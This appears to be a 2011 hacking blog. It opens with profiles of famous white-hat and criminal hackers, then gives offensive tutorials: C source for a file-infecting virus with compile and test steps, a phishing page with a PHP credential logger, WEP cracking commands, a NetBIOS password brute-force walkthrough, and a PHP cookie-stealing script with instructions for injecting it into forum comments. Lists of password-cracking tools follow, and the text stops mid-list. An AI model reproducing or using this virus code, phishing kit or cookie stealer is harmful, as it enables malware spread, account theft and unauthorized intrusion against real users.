Wednesday, September 28, 2011

The world's top 5 Non-Criminal hackers

Hackers that use their hacking skills for good are referred to as "white hat" hackers. Often referred to as Ethical Hackers, these non-criminal hackers are hired by companies to examine and test the integrity of their systems. Other white hat hackers, operate without company permission by bending but not breaking the laws and int progress have created some very cool features. This article examines and selects the Five Best Non-Criminal Hackers and the innovations and technologies that they have developed:

1. Stephen Wozniak

Nicknamed Woz, he is often referred to as the other Steve of Apple. Wozniak and Steve Jobs, co-founded Apple Computer. Woz started his hacking making blue boxes, which are devices that bypass telephone switching mechanisms enabling users to make free long distance calls. Woz and Jobs sold these blue boxes to their classmates in college and even used a blue box to call the Pope while pretending to be Henry Kissinger.
Wozniak dropped out of college and invented the compute that made him famous. Jobs had the idea to sell the computer as a fully assembled PC board. The idea was conceived and developed in Jobs garage. Wozniak and Jobs sold the first 100 of the Apple I to a local dealer for $666.66 each.
Woz currently focuses on philanthropy and no longer works full time for Apple. "Wozniak 'adopted' the Los Gatos School District, providing students and teachers with hands-on teaching and donations of state-of-the-art technology equipment."

2. Tim Berners-Lee

Berners-Lee is credited with being the inventor of the World Wide Web. Berners-Lee has been honored with numerous recognitions incuding the Millennium Technology Prize.
Berners-Lee was first caught hacking access codes with a friend while a student at Oxford University. He was then banned from the University computers.
Berners-Lee realized that hypertext could be joined with the Internet. Berners-Lee recounts how he put them together: "I just had to take the hypertext idea and connect it to the TCP and DNS ideas and – ta-da! – the World Wide Web."
Since his creation of the World Wide Web, Berners-Lee founded the World Wide Web Consortium at MIT. The W3C describes itself as "an international consortium where Member organizations, a full-time staff and the public work together to develop Web standards." Berners-Lee's World Wide Web idea, as well as standards from the W3C, is distributed freely with no patent or royalties due.

3. Linus Torvalds

Torvalds fathered Linux, the very popular Unix-based operating system. He calls himself "an engineer," and has said that his aspirations are simple, "I just want to have fun making the best damn operating system I can."
Torvalds got his start in computers with a Commodore VIC-20, an 8-bit home computer. He then moved on to a Sinclair QL. Wikipedia reports that he modified the Sinclair "extensively, especially its operating system." Specifically, Torvalds hacks included "an assembler and a text editor…as well as a few games."
Torvalds created the Linux kernel in 1991, using the Minix operating system as inspiration. He started with a task switcher in Intel 80386 assembly and a terminal driver. After that, he put out a call for others to contribute code, which they did. Currently, only about 2 percent of the current Linux kernel is written by Torvalds himself. The success of this public invitation to contribute code for Linux is touted as one of the most prominent examples of free/open source software.
Currently, Torvalds serves as the Linux ringleader, coordinating the code that volunteer programmers contribute to the kernel. He has had an asteroid named after him and received honorary doctorates from Stockholm University and University of Helsinki. He was also featured in Time Magazine's "60 Years of Heroes."

4. Richard Stallman

Stallman's fame derives from the GNU Project, which he founded to develop a free operating system. For this, he's known as the father of free software. His "Serious Bio" asserts, "Non-free software keeps users divided and helpless, forbidden to share it and unable to change it. A free operating system is essential for people to be able to use computers in freedom."
Stallman, who prefers to be called rms, got his start hacking at MIT. He worked as a "staff hacker" on the Emacs project and others. He was a critic of restricted computer access in the lab. When a password system was installed, Stallman broke it down, resetting passwords to null strings, then sent users messages informing them of the removal of the password system.
Stallman's crusade for free software started with a printer. At the MIT lab, he and other hackers were allowed to modify code on printers so that they sent convenient alert messages. However, a new printer came along – one that they were not allowed to modify. It was located away from the lab and the absence of the alerts presented an inconvenience. It was at this point that he was "convinced…of the ethical need to require free software."
With this inspiration, he began work on GNU. Stallman wrote an essay, "The GNU Project," in which he recalls choosing to work on an operating system because it's a foundation, "the crucial software to use a computer." At this time, the GNU/Linux version of the operating system uses the Linux kernel started by Torvalds. GNU is distributed under "copyleft," a method that employs copyright law to allow users to use, modify, copy and distribute the software.
Stallman's life continues to revolve around the promotion of free software. He works against movements like Digital Rights Management (or as he prefers, Digital Restrictions Management) through organizations like Free Software Foundation and League for Programming Freedom. He has received extensive recognition for his work, including awards, fellowships and four honorary doctorates.

5. Tsutomu Shimomura

Shimomura reached fame in an unfortunate manner: he was hacked by Kevin Mitnick. Following this personal attack, he made it his cause to help the FBI capture him.
Shimomura's work to catch Mitnick is commendable, but he is not without his own dark side. Author Bruce Sterling recalls: "He pulls out this AT&T cellphone, pulls it out of the shrinkwrap, finger-hacks it, and starts monitoring phone calls going up and down Capitol Hill while an FBI agent is standing at his shoulder, listening to him."
Shimomura out-hacked Mitnick to bring him down. Shortly after finding out about the intrusion, he rallied a team and got to work finding Mitnick. Using Mitnick's cell phone, they tracked him near Raleigh-Durham International Airport. The article, "SDSC Computer Experts Help FBI Capture Computer Terrorist" recounts how Shimomura pinpointed Mitnick's location. Armed with a technician from the phone company, Shimomura "used a cellular frequency direction-finding antenna hooked up to a laptop to narrow the search to an apartment complex." Mitnick was arrested shortly thereafter. Following the pursuit, Shimomura wrote a book about the incident with journalist John Markoff, which was later turned into a movie.

The world's top 5 criminal hackers

The Black Hat Hackers - CriminalsThese hackers are the ones that you've seen in shackles arrested for cybercrimes when they were just getting out of puberty. Some have done it for financial gain others just for fun.

1. Kevin Mitnick.

Mitnick is perhaps synonymous with Hacker. The Department of Justice still refers to him as "the most wanted computer criminal in United States history." His accomplishments were memorialized into two Hollywood movies: Takedown and Freedom Downtime.
Mitnick got his start by exploiting the Los Angeles bus punch card system and getting free rides. Then similar to Steve Wozniak, of Apple, Mitnick tried Phone Phreaking. Mitnick was first convicted for hacking into the Digital Equipment Corporation's computer network and stealing software.
Mitnick then embarked on a two and a half year coast to coast hacking spree. He has stated that he hacked into computers, scrambled phone networks, stole corporate secrets and hacked into the national defense warning system. His fall came when he hacked into fellow computer expert and hacker Tsutomu Shimomura's home computer.
Mitnick is now a productive member of society. After serving 5 years and 8 months in solitary confinement, he is now a computer security author, consultant and speaker.

2. Adrian Lamo

Lamo hit major organizations hard, hacking into Microsoft and The New York Times. Lamo would use Internet connections at coffee shops, Kinko's and libraries to achieve his feats earning him the nickname "The Homeless Hacker". Lamo frequently found security flaws and exploited them. He would often inform the companies of the flaw.
Lamo's hit list includes Yahoo!, Citigroup, Bank of America and Cingular. Of course White Hat Hackers do this legally because they are hired by the company to such, Lamo however was breaking the law.
Lamo's intrusion into The New York Times intranet placed him squarely into the eyes of the top cyber crime offenders. For this crime, Lamo was ordered to pay $65,000 in restitution. Additionally, he was sentenced to six months home confinement and 2 years probation. Probation expired January of 2007. Lamo now is a notable public speaker and award winning journalist.

3. Jonathan James

At 16 years old, James gained enormous notoriety when he was the first minor to be sent to prison for hacking. He later admitted that he was just having fun and looking around and enjoyed the challenge.
James hit high profile organizations including the Defense Threat Reduction Agency, which is an agency of the Department of the Defense. With this hack he was able to capture usernames and passwords and view highly confidential emails.
High on James list, James also hacked in NASA computers and stole software valued at over $1.7 million. The Justice Department was quoted as saying: "The software stolen by James supported the International Space Station's physical environment, including control of the temperature and humidity within the living space." Upon discovering this hack, NASA had to shut dow its entire computer system costing taxpayers $41,000. Today James aspires to start a computer security company.

4. Robert Tappan Morris

Morris is the son of a former National Security Agency scientist named Robert Morris. Robert is the creator of the Morris worm. This worm was credited as the first computer worm spread through the Internet. Because of his actions, he was the first person to be prosecuted under the 1986 Computer Fraud and Abuse Act.
Morris created the worm while at Cornell as a student claiming that he intended to use the worm to see how large the Internet was at the time. The worm, however, reproduced itself uncontrollably, shutting down many computers until they had completely malfunctioned. Experts claim 6,000 machines were destroyed. Morris was ultimately sentenced to three years' probation, 400 hours of community service and assessed a $10,500 fine.
Morris is now a tenured professor at the MIT Computer Science and Artificial Intelligence Laboratory. His focus is computer network architecture.

5. Kevin Poulsen

Frequently referred to as Dark Dante, Poulsen gained national recognition for his hack into Los Angeles radio's KIIS-FM phone lines. These actions earned him a Porsche among many other items.
The FBI began to search for Poulson, when he hacked into the FBI database and federal computers for sensitive wiretap information. Poulsen's specialty was hacking into phone lines and he frequently took over all of a station's phone lines. Poulson also reactivated old Yellow Page escort telephone numbers for a partner who operated a virtual escort agency. Poulson was featured on Unsolved Mysteries and then captured in a supermarket. He was assessed a sentence of five years.
Since his time in prison, Poulsen has worked as a journalist and was promoted to senior editor for Wired News. His most popular article details his work on identifying 744 sex offenders with Myspace profiles.

Creating a virus : Tutorial


This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.
 
#include
#include
#include
#include
#include
#include FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
 

COMPILING METHOD:

 
USING BORLAND TC++ 3.0 (16-BIT):
1. Load the program in the compiler, press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
 
USING BORLAND C++ 5.5 (32-BIT) :
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect
 

HOW TO TEST:

 
1. Open new empty folder
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to reinfect
That’s it

Fasttrack - an automated penetration tool for linux

Fast-Track is a python based open-source project aimed at helping Penetration Testers in an effort to identify, exploit, and further penetrate a network. Fast-Track was originally conceived when a h4cker was on a penetration test and found that there was generally a lack of tools or automation in certain attacks that were normally extremely advanced and time consuming.


In an effort to reproduce some advanced attacks and propagate it down , he ended up writing Fast-Track for the public. Many of the issues Fast-Track exploits are due to improper sanitizing of client-side data within web applications, patch management, or lack of hardening techniques. All of these are relatively simple to fix if you know what to look for, but as penetration testers are extremely common findings for us. Fast-Track arms the penetration tester with advanced attacks that in most cases have never been performed before. Sit back relax, crank open a can of jolt cola and enjoy the ride.


Installing Fast-Track:
make sure you have the latest version of Subversion

Open a terminal and type the following command (In Linux offcourse) :


svn co http://svn.thepentest.com/fasttrack /path-to-install/

The svn co simply means "check out" the latest version of Fast-Track, the /path-to-install/ is the directory you want to install Fast-Track.

If you want to update Fast-Track after you check out the files, simply type svn update, or use the Fast-Track menu to update.

When you first check out Fast-Track, there are a few modules that need to be installed, fortunately, Fast-Track comes with a setup file that helps you install the files needed. From the command line and in the Fast-Track menu, simply type:

python setup.py install

Follow the guide for installing Fast-Track, note that the setup does NOT install Metasploit for you. If you don't have Metasploit installed, some applications will not work properly. Ensure that you enter the right path to Metasploit.

Once installation has finished, run Fast-Track, if it errors out saying you do not have the proper requirements, type yes to try a different type of install. If this still doesn't work you will need to manually install the requirements.



now to run Fast-Track type:
./fast-track.py
 

to run the web GUI mod:
./ftgui
Open a browser and go to http://127.0.0.1:44444

Fast-Track HomePage: http://www.thepentest.com


Creating a fake ( phishing ) page of gmail , facebook , orkut , myspace etc.

Phishing has become a very easy to use trick to hack usernames and passwords of users. Here demonstrate how to create a fake phishing page for almost any social networking site , email or any other site that has a login form.

For this trick you would need a hosting account , you can get that easily.
Register yourself at t35, host1free, 110mb etc.
Note- 110mb checks for phishing page on their site and removes them.



So now u have a hosting account so lets create a fake page-

First go to the target site. In your browser select Save As from the File menu and save the site on
 your hardisk with name "login.htm" .

or alternatively right click on the page and click "view source" and copy all of it and save them to a notepad file. Rename the file with "login.htm".

Now the second part of the hack-
Go to Notepad and copy this into it-



header ('Location: http://www.facebook.com');

$handle = fopen("log.txt", "a");

foreach($_POST as $variable => $value) {

   fwrite($handle, $variable);

   fwrite($handle, "=");

   fwrite($handle, $value);

   fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>


replace facebook.com with the URL you want the user to go after he clicks on submit button.

Save the page as fish.php


Now you need to edit the "login.htm" file we saves earlier. So go to that and open it with notepad.
now search for anyhtin like "action=" which has something with login. And replace the URl with "fish.php".

Also create a blank txt file with name "log.txt" . This file would be used to save your logins and passwords.
Now you are done,.

Go to your hosting account and upload all the files to your server.
Now go to the URL provided by ur host.

Like - http://g00glepage.t35.com/login.htm

And you would see the fake page as it is.
Now enter the username and password.

Check the log.txt file. The password and username you enterd previously would be saved in the log.txt  file.

Here you have a working phishing page.

Finding admin page of any site

A web site can easily be hacked if you know the hack the admin of the website. So for that you need to know the admin page of the website. And that could be a headache sometimes.


So here is a page made by a hacker that works for you and searches the site for the admin page.

http://sc0rpion.ir/af/

Just go to the site and enter the url of the site or blog followed by a  "/" and it would search for all those pages it thinks to be admin pages. Quite simple.

How it works-
The site has a huge list of commonly occurring admin pages common on the web. So the site just adds those one by one and tests whether and page by that name exists or not.
If there is any admin page it would show up.  

Backtrack : The linux distro made for and by hackers


Linux is obviously te best tool to try your hacking skills, as it is robust, made by hackers, gives you all tools for free and let you do what you want to do with it.To start your hacking stuff you need to get a lot of tools and you might be stuck when some tool starts creating error and you wish that your system had all these prehandedly. Here Backtrack comes in the scenario.

Backtrack linux is just what every hacker dreams of, a full system preloaded with every tool you would have ever wished for. It haws almost every tool ever invented for hackers to lay there hands on.

BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tools collection to-date. Our community of users range from skilled penetration testers in the information security field, government entities, information technology, security enthusiasts, and individuals new to the security community.

Backtrack was made for everyone including tools for the amateur hackers to deep balck hats.

Download Backtrack here:
Normal download     Torrent

A few Tools

BackTrack provides users with easy access to a comprehensive and large collection of security-related tools ranging from port scanners to password crackers. Support for Live CD and Live USB functionality allows users to boot BackTrack directly from portable media without requiring installation, though permanent installation to hard disk is also an option.

BackTrack includes many well known security tools including:

* Metasploit integration
* RFMON Injection capable wireless drivers
* Kismet
* Nmap
* Ettercap
* Wireshark (formerly known as Ethereal)
* BeEF (Browser Exploitation Framework)
* Hydra

A large collection of exploits as well as more commonplace software such as browsers. BackTrack arranges tools into 11 categories:

* Information Gathering
* Network Mapping
* Vulnerability Identification
* Web Application Analysis
* Radio Network Analysis (802.11, Bluetooth, RFID)
* Penetration (Exploit & Social Engineering Toolkit)
* Privilege Escalation
* Maintaining Access
* Digital Forensics
* Reverse Engineering
* Voice Over IP
Source- http://www.backtrack-linux.org/

Wireless Hacking tutorial using Backtrack

Wireless Hacking with backtrack 3 is easy to do , in this article I’d like to guide you in Wireless hacking with backtrack 3. This tutorial is made based on some requests by my subscribers , they’ve been familiar enough with Backtrack 3 , that’s why I made this Wireless Hacking with backtrack 3 tutorial. In order to start the wireless hacking , you need to make sure that you have met these requirements :
 

- Backtrack 3 or newer release

- 1 wireless router

- Laptop with wireless card

And let the hack begins :

In order to crack a WEP key you must have a large number of encrypted packets to work with. This is an unavoidable requirement if you wish to be successful. The best way to get a large number of packets is to perform an ARP request re injection attack (otherwise known as attack -3). In order to do this attack and get results there must be a client already authenticated with the AP, aor connecting to the AP.

***********************************************************************
Here are some things you need to know before you get confused
When you see this (device) or (bssid) you DON’T put the ( )!!!
(device) = Your wireless card *can be seen by typing in iwconfig EG: eth0, eth1, ath0, ath1
(bssid) = This is the consenting computers bssid *when you start airodump-ng if there is a AP in range it will show up on the left side will look similar to 00:11:22:33:44:55
************************************************************************

Now before we start we need to make a txt file in the home folder. On the desktop you will see 2 icons home and system. Double click the home icon, rigt click the blank white area and select create new Txt File name it Exidous or what ever you want! click ok, now close the window.

Ok let’s start!
Commands | Meaning
====================

*open up 3 shell konsoles by clicking the little black box next to the start button.

* The first thing were going to do is stop the device aka ethernet card
airmon-ng stop ath0

* Now were going to put the wireless card down, so we can fake a mac adress (to see available wireless cards type, iwconfig
ifconfig (device) down



* Ok now just to make things simpler, so we don’t have to hunt down what our Mac address is
macchanger –mac 00:11:22:33:44:55 (device)

* Now were going to start the wireless card *make it listen for AP’s
airmon-ng start (device)

* Lets start seeing what AP’s are there
airodump-ng (device)

* After you see all the AP’s execute the following command to stop it and copy the bssid
CTRL+C Copy bssid of consenting computer

* Now on to the consenting computer’s AP (were listening in for authentication packets
airodump-ng -c 6 -w Exidous –bssid (Bssid) (device)

* Lets get on with making more Data, and start the injection process
aireplay-ng -l 0 -a (bssid) -h 00:11:22:33:44:55 (device)

* Now were going to inject the router ***this sometimes takes a while to actually inject!
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (device)

* On to cracking the key, ***AFTER GETTING AT LEAST 5,000 Data/IV’s for 64 bit encryption / AFTER GETTING AT LEAST 10,000 Data/IV’s for 128 bit encryption
aircrack-ng -n 64 –bssid (bssid) Exidous-01.cap

* Once you crack the wep key you wright it down, and reboot to windows. Now put it in the username and the password with out the :
EG: Wep Key = 33:C7:C6:09:30
When Entered into username and password it will look like this. 33C7C60930

Get backtrack linux at - http://www.backtrack-linux.org/

Tuesday, September 27, 2011

Hack computer in your LAN (Windows)

Here we hack a PC somwhere in our LAN. This is a simple trick that uses open port to gain access to the target computer.The Lan hacking technique uses port 139 for the hack. On a LAN mostly the port 139 would remain open.

Today,I will write about hacking computer inside the LAN network.

This technique will be taking advantage of Port 139.

Most of the time,Port 139 will be opened.

First of all,I will do a port scanning at the target computer which is 192.168.40.128.

This computer is inside my LAN network.

I will scan it using Nmap.

[Image: 1_13.jpg]

I get the result and it shows Port 139 is opened up for me.

Now you will need both of these tools:
** USER2SID & SID2USER
** NetBios Auditing Tool

You can get both of them on the Internet.

After you get both of them,put them in the C:\ directory.

[Image: 2_1.jpg]

You now need to create a null session to the target computer.

[Image: 3_3.jpg]

Now open the Command Prompt and browse to the USER2SID & SID2USER folder.There will be 2 tools inside it,one will be USER2SID and another one will be SID2USER.

We will first using USER2SID to get the ID.

[Image: 4_10.jpg]

We will test against the Guest account because Guest account is a built in account.

After we get the ID,we need to do some modification on the ID.

We take the ID we get from the guest account and modified it become
"5 21 861567501 1383384898 839522115 500".

Please leave out the S-1-,leave out all the - too.

[Image: 5_8.jpg]

Now you will see that you get the username of the Administrator account.

In this case,the Administrator account is Administrator.

Create a text file called user.txt and the content will be the username of the Admin account.

[Image: 6.jpg]

Prepare yourself a good wordlist.

[Image: 7.jpg]

Now put both of them in the same directory with the NetBios Auditing Tool.

[Image: 8.jpg]

Now we are going to crack the Admin account for the password in order to access to the target computer.

Browse to the NetBios Auditing Tool directory.

[Image: 9_1.jpg]

Press on enter and the tool will run through the passlist.

[Image: 10.jpg]

In this case,I have get the password.

In order to proof that I can get access to the target computer using this password.

[Image: 11.jpg]

After you press enter,it will prompt you for the username and password.

[Image: 12_6.jpg]

Therefore,just input them inside the prompt and continue.

[Image: 13.jpg]

Target C drive will be on your screen.

[Image: 14.jpg]

In order to prevent from this attack,close down port that you do not want to use such as Port 135,Port 136,Port 137,Port 138 and Port 139.

The download link of the tools will be:
Download Tools.rar

We check for open 139 port by using Zenmap, you can use any other port scanners as well.

For this you need to know the IP of computers in your network which would most probably look like 192.168.xx where only 'xx' changes in range 0 to 255 and shows different IPs.

Once we get the IP of the target machine we scan it using Nmap.


[Image: 1_13.jpg]

Here we see that port 139 is open and ready to be hacked.

We need these two hack tools-
** USER2SID & SID2USER
** NetBios Auditing Tool

Google them on the net.

After you get both of them,put them in the C:\ directory.

[Image: 2_1.jpg]

Create a null session on your computer do this as follows:-

[Image: 3_3.jpg]

Now open the Command Prompt and browse to the USER2SID & SID2USER folders .There will be 2 tools inside it,one would be USER2SID and another one be SID2USER.

We use USER2SID to get the ID of the user on target machine.

[Image: 4_10.jpg]

We will test against the Guest account because Guest account is a built in account.

After we get the ID,we need to do some modification on the ID.

We use the ID which we got from the guest account and modify it-

"5 21 861567501 1383384898 839522115 500".

Please leave out the S-1-,leave out all the - too.

[Image: 5_8.jpg]

Now you will see that you get the username of the Administrator account.

In this case,the Administrator account is "Administrator".

Create a text file called user.txt and the content will be the username of the Admin account.

[Image: 6.jpg]

Prepare yourself a good wordlist. Or get the list of most common password on the internet.

[Image: 7.jpg]

Now put both of them in the same directory with the NetBios Auditing Tool.

[Image: 8.jpg]

Now we are going to crack the Admin account for the password in order to access to the target computer.

Browse to the NetBios Auditing Tool directory.

[Image: 9_1.jpg]

Press on enter and the tool will run through the passlist.

[Image: 10.jpg]

In this case,we have the password.

In order to proof that we can get access to the target computer using this password.

[Image: 11.jpg]

After you press enter,it will prompt you for the username and password.

[Image: 12_6.jpg]

Therefore,just input them inside the prompt and continue.

[Image: 13.jpg]

Target C drive will be pop on your screen.

[Image: 14.jpg]

In order to prevent from this attack,close down port that you do not want to use such as Port 135,Port 136,Port 137,Port 138 and Port 139.

The download link of the tools will be:
Download Tools.rar

The top 10 password breakers/crakers

The best password crackers. The list made from all password brealkers from all over the globe including versions from unix and widnows as well.


1. Cain and Abel : The top password recovery tool for Windows

UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols

2. John the Ripper : A powerful, flexible, and fast multi-platform password hash cracker

John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes

3. THC Hydra : A Fast network authentication cracker which support many different services

When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more

4. Aircrack : The fastest available WEP/WPA cracking tool

Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files)

5. L0phtcrack : Windows password auditing and recovery application

L0phtCrack, also known as LC5, attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows NT/2000 workstations, networked servers, primary domain controllers, or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary, brute force, etc). LC5 was discontinued by Symantec in 2006, but you can still find the LC5 installer floating around. The free trial only lasts 15 days, and Symantec won't sell you a key, so you'll either have to cease using it or find a key generator. Since it is no longer maintained, you are probably better off trying Cain and Abel, John the Ripper, or Ophcrack instead.

6. Airsnort : 802.11 WEP Encryption Cracking Tool

AirSnort is a wireless LAN (WLAN) tool that recovers encryption keys. It was developed by the Shmoo Group and operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. You may also be interested in the similar Aircrack.

7. SolarWinds : A plethora of network discovery/monitoring/attack tools

SolarWinds has created and sells dozens of special-purpose tools targeted at systems administrators. Security-related tools include many network discovery scanners, an SNMP brute-force cracker, router password decryption, a TCP connection reset program, one of the fastest and easiest router config download/upload applications available and more.

8. Pwdump : A window password recovery tool

Pwdump is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is enabled. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file.

9. RainbowCrack : An Innovative Password Hash Cracker

The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one, which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called "rainbow tables". It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished.

10 Brutus : A network brute-force authentication cracker

This Windows-only cracker bangs against network services of remote systems trying to guess passwords by using a dictionary and permutations thereof. It supports HTTP, POP3, FTP, SMB, TELNET, IMAP, NTP, and more. No source code is available. UNIX users should take a look at THC Hydra.

Session hijacking or cookie stealing using php and javascript

In computer science, session hijacking refers to the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer (see HTTP cookie theft).

Here we show how you can hack a session using javascript and php.

What is a cookie?

A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged everytime it accesses the server.
A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time.
Cookie is used to maintain users authentication and to implement shopping cart during his navigation,possibly across multiple visits.

What can we do after stealing cookie?

Well,as we know web sites authenticate their user's with a cookie,it can be used to hijack the victims session.The victims stolen cookie can be replaced with our cookie to hijack his session.

This is a cookie stealing script that steals the cookies of a user and store them in a text file, these cookied can later be utilised.

PHP Code:

function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}

function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();

$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");

if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}

logData();

?>

Save the script as a cookielogger.php on your server.
(You can get any free webhosting easily such as justfree,x10hosting etc..)

Create an empty text file log.txt in the same directory on the webserver. The hijacked/hacked cookies will be automatically stored here.

Now for the hack to work we have to inject this piece of javascript into the target's page. This can be done by adding a link in the comments page which allows users to add hyperlinks etc. But beware some sites dont allow javascript so you gotta be lucky to try this.

The best way is to look for user interactive sites which contain comments or forums.

Post the following code which invokes or activates the cookielogger on your host.

Code:


Your can also trick the victim into clicking a link that activates javascript.
Below is the code which has to be posted.

Code:
Click here!

Clicking an image also can activate the script.For this purpose you can use the below code.

Code:



All the details like cookie,ipaddress,browser of the victim are logged in to log.txt on your hostserver

In the above codes please remove the space in between javascript.

Hijacking the Session:

Now we have cookie,what to do with this..?
Download cookie editor mozilla plugin or you may find other plugins as well.

Go to the target site-->open cookie editor-->Replace the cookie with the stolen cookie of the victim and refresh the page.Thats it!!!you should now be in his account. Download cookie editor mozilla plugin from here : https://addons.mozilla.org/en-US/firefox/addon/573

Don't forget to comment if you like my post. 

Hacking tools that every hacker must have

 These toolsmake the life of a hacker much easier and every n00b must first learn how to use these tools first.

AIRCRACK

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools. In fact, Aircrack-ng is a set of tools for auditing wireless networks.

Site URL:
http://www.aircrack-ng.org/

BackTrack

BackTrack is a A Linux Distribution focused on penetration testing.

Site URL:

http://www.bactrack-linux.org

BarsWF
BarsWF is the worlds fastest md5 bruteforcing password cracker, just in case you didn't already know.
It combines using your computers processor with you graphics cards GPU for computing the largest amount of hashes as quickly as possible. It is not unheard of to get 100's of millions of hashes per second when using this application.

Prerequisites which really dont need to be mentioned are a processor with SSE2 instruction set, and any nvidia geforce 8 and up graphics card with CUDA support if you want the really fast one, otherwise most decently new nvidia graphics cards bought in the past 2 years should be able to work with this.

Site URL:
http://3.14.by/en/md5


BLOODSHED IDE

Bloodshed IDE is an Integrated Development Environment (IDE) for the C/C++ programming language.
Site URL:
http://www.bloodshed.net/devcpp.html


CAIN AND ABEL
Cain and Abel is a Windows password cracker, capable of cracking a variety of hashes, as well as arp poisoning, sniffing the network, etc.. to obtain those password hashes in the first place.

Site URL:
http://www.oxid.it/cain.html

CANVAS
